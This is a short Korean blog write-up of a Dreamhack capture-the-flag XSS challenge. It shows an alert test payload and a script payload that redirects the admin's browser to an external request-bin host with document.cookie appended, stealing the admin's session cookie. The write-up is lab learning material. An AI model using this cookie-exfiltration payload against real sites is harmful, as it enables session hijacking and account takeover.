xss 1

buaii·2023년 7월 6일
0

Web Hacking

목록 보기
6/34
post-custom-banner

xss


xss를 이용하는 문제

vuln page에 접속하면 아래처럼 알림이 발생한다
url param값을 보니 <script>alert(1)</script>로 xss가 발생했다

이번엔 flag page를 보자
해당 url로 관리자가 확인을 하는 것 같다
xss를 심어 관리자의 쿠키를 탈취해보자

payload

dreamhack의 request bin으로 관리자가 쿠키값을 전달하도록 xss를 작성해보자

<script>location.href="https://ueykqyv.request.dreamhack.games/"+document.cookie</script>

payload를 입력 후 제출하면 request bin에 응답이 온다

admin의 쿠키탈취를 성공했다

profile
buaii
post-custom-banner

0개의 댓글